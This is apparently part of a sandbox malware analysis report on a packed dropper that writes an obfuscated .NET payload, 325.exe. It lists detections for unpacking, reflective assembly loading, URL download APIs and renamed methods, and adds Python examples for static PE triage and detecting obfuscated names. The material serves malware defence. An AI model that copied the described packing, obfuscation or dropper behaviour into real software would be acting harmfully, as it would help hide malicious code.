                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Unpacked PE file: 0.2.kS2dqbsDwD.exe.140000000.2.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                    .NET source code contains potential unpacker
                    Source: 325.exe.0.dr, uNotepad/Form1.cs .Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/Form1.cs .Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/Form1.cs .Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/Form1.cs .Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140060290 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetOpenUrlW,FreeLibrary,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,FreeLibrary,DeleteFileW,FreeLibrary,
                    Source: initial sample Static PE information: section where entry point is pointing to: .MPRESS2
                    Source: kS2dqbsDwD.exe Static PE information: real checksum: 0x9a0ca should be: 0xa1dfe
                    Source: 325.exe.0.dr Static PE information: real checksum: 0x0 should be: 0xf8b72
                    Source: kS2dqbsDwD.exe Static PE information: section name: .MPRESS1
                    Source: kS2dqbsDwD.exe Static PE information: section name: .MPRESS2
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095CF80 push eax; iretd (4 identical entries)
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095CD08 pushad ; retf (3 identical entries)
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095F2A3 push esi; retf 0000h (3 identical entries)
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099BAD8 push esi; retn 0000h (3 identical entries)
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099CACC push esp; ret (3 identical entries)
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099D9FB push edi; ret (3 identical entries)
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099DF01 push ds; iretd (3 identical entries)
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_00993723 pushfd ; ret (3 identical entries)
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099DA4B push edi; ret (3 identical entries)
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_00996762 push es; retn 0002h (3 identical entries)
                    Source: initial sample Static PE information: section name: .MPRESS1 entropy: 7.99951858505
                    Source: initial sample Static PE information: section name: .text entropy: 7.5685116349
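                    The static findings listed above for the dropper (MPRESS section names, execute/read section rights on disk versus execute/write in the memory dump, entry point inside .MPRESS2, a stored checksum that does not match the computed one, section entropy close to 8 bits, an image base above 0x60000000) can all be reproduced offline from the PE headers. The Python below is an added example, not Joe Sandbox's code or anything from the sample; it parses the headers with the standard library only and runs against a small PE32+ image built inline to mimic the layout the report describes (constructed data, not the analysed file; the section sizes, RVAs and contents are assumptions).

```python
"""Static PE triage: section names and rights, per-section Shannon entropy,
the section containing the entry point, image base, and PE checksum check.
Pure stdlib; the sample image is constructed inline (not the real file)."""
import collections
import hashlib
import math
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(buf):
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly random bytes."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in collections.Counter(buf).values())


def pe_checksum(data, checksum_offset):
    """The PE checksum (imagehlp's CheckSumMappedFile algorithm): fold the file
    as 32-bit words, skip the CheckSum field itself, add the file length.
    checksum_offset is assumed 4-byte aligned (true for normal headers)."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return ((total & 0xFFFF) + len(data)) & 0xFFFFFFFF


def perms(characteristics):
    """Render section rights as the report does: E, R, W letters."""
    flags = ((IMAGE_SCN_MEM_EXECUTE, "E"), (IMAGE_SCN_MEM_READ, "R"), (IMAGE_SCN_MEM_WRITE, "W"))
    return "".join(letter for bit, letter in flags if characteristics & bit)


def triage(data):
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    _machine, nsections, _, _, _, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    # ImageBase: 8 bytes at +24 in PE32+ (magic 0x20B), 4 bytes at +28 in PE32.
    image_base = (struct.unpack_from("<Q", data, opt + 24)[0] if magic == 0x20B
                  else struct.unpack_from("<I", data, opt + 28)[0])
    checksum_offset = opt + 64  # same offset in both optional-header formats
    stored = struct.unpack_from("<I", data, checksum_offset)[0]
    computed = pe_checksum(data, checksum_offset)
    sections, entry_section = [], None
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr, _, _, _, _, sc = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        name = name.rstrip(b"\0").decode("latin-1")
        raw = data[rawptr:rawptr + rawsize]
        sections.append({"name": name, "perms": perms(sc), "entropy": round(shannon_entropy(raw), 4)})
        if va <= entry_rva < va + max(vsize, rawsize):
            entry_section = name
    return {"sections": sections, "entry_section": entry_section, "image_base": image_base,
            "image_base_unusual": image_base > 0x60000000,  # threshold the report itself uses
            "checksum_stored": stored, "checksum_computed": computed, "checksum_ok": stored == computed}


def fix_checksum(data):
    """Copy of the file with the CheckSum field set to the correct value."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    off = e_lfanew + 4 + 20 + 64
    out = bytearray(data)
    struct.pack_into("<I", out, off, pe_checksum(data, off))
    return bytes(out)


def _pseudo_random(n, seed=b"packed"):
    """Deterministic high-entropy filler standing in for a packed section."""
    out, cur = bytearray(), seed
    while len(out) < n:
        cur = hashlib.sha256(cur).digest()
        out += cur
    return bytes(out[:n])


def build_sample_pe():
    """Constructed PE32+ resembling the report's layout (assumed sizes/RVAs):
    packed .MPRESS1, entry point in .MPRESS2, writable .rsrc, CheckSum = 0."""
    code = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
    layout = [  # name, file offset, raw size, RVA, characteristics, content
        (b".MPRESS1", 0x200, 0x1000, 0x1000, code, _pseudo_random(0x1000)),
        (b".MPRESS2", 0x1200, 0x200, 0x2000, code, b"\x48\x31\xc0\xc3".ljust(0x200, b"\0")),
        (b".rsrc", 0x1400, 0x200, 0x3000, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_WRITE,
         b"RSRC".ljust(0x200, b"\0")),
    ]
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x8664, len(layout), 0, 0, 0, 240, 0x22)
    opt = struct.pack("<HBBIIIIIQIIHHHHHHIIIIHHQQQQII", 0x20B, 14, 0, 0x1200, 0x400, 0,
                      0x2000, 0x1000, 0x140000000, 0x1000, 0x200, 6, 0, 0, 0, 6, 0, 0,
                      0x4000, 0x200, 0, 2, 0x8160, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"\0" * (240 - len(opt))                               # 16 empty data directories
    headers = dos + b"PE\0\0" + coff + opt
    for name, fileoff, rawsize, rva, sc, _ in layout:
        headers += struct.pack("<8sIIIIIIHHI", name, rawsize, rva, rawsize, fileoff, 0, 0, 0, 0, sc)
    image = bytearray(max(f + s for _, f, s, _, _, _ in layout))
    image[:len(headers)] = headers
    for _, fileoff, _, _, _, content in layout:
        image[fileoff:fileoff + len(content)] = content
    return bytes(image)


if __name__ == "__main__":
    for key, value in triage(build_sample_pe()).items():
        print(f"{key}: {value}")
```

                    To run it against a real file use `triage(open(path, "rb").read())`. Note that the EW rights in the "Detected unpacking" entry come from the dumped in-memory image (the unpack stub changes page protections at runtime), so a static parse of the file on disk will only ever show the ER rights the report lists on the right-hand side of that comparison.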
                    Source: 325.exe.0.dr, uNotepad/Form_Main.cs High entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
                    Source: 325.exe.0.dr, uNotepad/MDSDDD.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
                    Source: 325.exe.0.dr, uNotepad/MainWindow.cs High entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
                    Source: 325.exe.0.dr, uNotepad/Form1.cs High entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
                    Source: 325.exe.0.dr, uNotepad/CollectionToSort.cs High entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
                    Source: 325.exe.0.dr, uNotepad/uNote.cs High entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
                    Source: 325.exe.0.dr, uNotepad/AramaFormu.cs High entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
                    Source: 325.exe.0.dr, uNotepad/CollectionOfElements.cs High entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
                    Source: 325.exe.0.dr, uNotepad/About.cs High entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
                    Source: 325.exe.0.dr, uNotepad/TextUtility.cs High entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/Form_Main.cs High entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/MDSDDD.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/Form1.cs High entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/MainWindow.cs High entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.cs High entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/About.cs High entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/AramaFormu.cs High entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/CollectionOfElements.cs High entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/TextUtility.cs High entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/uNote.cs High entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/Form_Main.cs High entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/MDSDDD.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/Form1.cs High entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/MainWindow.cs High entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.cs High entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/CollectionOfElements.cs High entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/AramaFormu.cs High entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/About.cs High entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/TextUtility.cs High entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/uNote.cs High entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/Form_Main.cs High entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/MDSDDD.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/Form1.cs High entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/MainWindow.cs High entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/CollectionToSort.cs High entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/CollectionOfElements.cs High entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/About.cs High entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/AramaFormu.cs High entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/TextUtility.cs High entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/uNote.cs High entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
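                    The "high entropy of concatenated method names" entries above are a heuristic for renaming obfuscators: a .NET obfuscator replaces readable method names with random alphanumeric strings, and that drives the character-level Shannon entropy of the joined names well above what English-derived identifiers produce. The Python below is an added example, not Joe Sandbox's implementation (the report does not state its threshold). It runs the heuristic over three of the method lists quoted above for 325.exe, one type with readable names and two with obfuscated ones; the 4.8-bit threshold and the second, case-run measure are my own assumptions.

```python
"""Renaming-obfuscation heuristic over .NET method names: character entropy of
the concatenated names plus the mean length of same-class character runs
(readable CamelCase has long lowercase runs, random names do not)."""
import collections
import math
import re

# Method-name lists quoted in the report for three types in 325.exe.
METHOD_NAMES = {
    "uNotepad/CollectionToSort.cs": [
        'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort',
        'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'],
    "uNotepad/About.cs": [
        '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa',
        'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj',
        'FYQft6BgvEERMwMpIU'],
    "uNotepad/TextUtility.cs": [
        'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg',
        'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'],
}

# Assumed threshold: readable identifier sets land around 4 bits/char,
# base-62 random names push the joined string above 5.
ENTROPY_THRESHOLD = 4.8

RUN = re.compile(r"[A-Z]+|[a-z]+|[0-9]+|[^A-Za-z0-9]+")


def shannon_entropy(text):
    """Bits per character of the given string (0.0 for empty input)."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in collections.Counter(text).values())


def mean_run_length(names):
    """Characters per run of one class (upper, lower, digit, other), averaged
    over all names.  'InitializeComponent' has 4 runs over 19 characters;
    'O7iYVnQ8fijTtIhHIa' has 14 runs over 18."""
    runs = sum(len(RUN.findall(name)) for name in names)
    return sum(len(name) for name in names) / runs if runs else 0.0


def assess(names, threshold=ENTROPY_THRESHOLD):
    entropy = shannon_entropy("".join(names))
    return {
        "entropy": round(entropy, 3),
        "mean_run": round(mean_run_length(names), 2),
        "suspicious": entropy > threshold,
    }


def rank_types(table=METHOD_NAMES):
    """Types ordered from most to least obfuscated-looking by name entropy."""
    return sorted(((assess(names)["entropy"], type_name) for type_name, names in table.items()),
                  reverse=True)


if __name__ == "__main__":
    for entropy, type_name in rank_types():
        print(f"{entropy:5.3f} bits/char  {type_name}  {assess(METHOD_NAMES[type_name])}")
```

                    On the three lists, the readable CollectionToSort set comes out at roughly 4.1 bits per character with long runs, while About and TextUtility, where six or seven of the names are random base-62 strings, land above the threshold with runs under two characters. Both measures are crude; a whole-assembly ranking is only a starting point for deciding which types to decompile first.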
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe File created: C:\Users\user\AppData\Roaming\325.exe
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014008B0A0 GetForegroundWindow,IsWindowVisible,IsIconic,ShowWindow,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400881E0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014008B280 GetWindowThreadProcessId,GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,BringWindowToTop,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014005E330 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,CreateDCW,GetDC,GetPixel,DeleteDC,ReleaseDC,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140075850 SetDlgItemTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus, (2 identical entries)
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140044A00 IsDlgButtonChecked,IsWindowVisible,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,IsDlgButtonChecked,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140071A10 GetWindowLongW,GetWindowLongW,SetWindowPos,EnableWindow,GetWindowRect,GetClientRect,MulDiv,MulDiv,GetWindowRect,GetWindowRect,GetClientRect,MulDiv,MulDiv,GetWindowRect,IsWindow,SetParent,SetWindowLongPtrW,SetParent,IsWindowVisible,IsIconic,SetWindowLongW,SetWindowLongW,SetWindowPos,InvalidateRect,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400C2BE0 IsIconic,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140040D29 IsZoomed,IsIconic,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140079D90 IsDlgButtonChecked,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,IsDlgButtonChecked,GetWindowLongW,ShowWindow,EnableWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,SetFocus,IsDlgButtonChecked,SetFocus,MapWindowPoints,InvalidateRect,
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
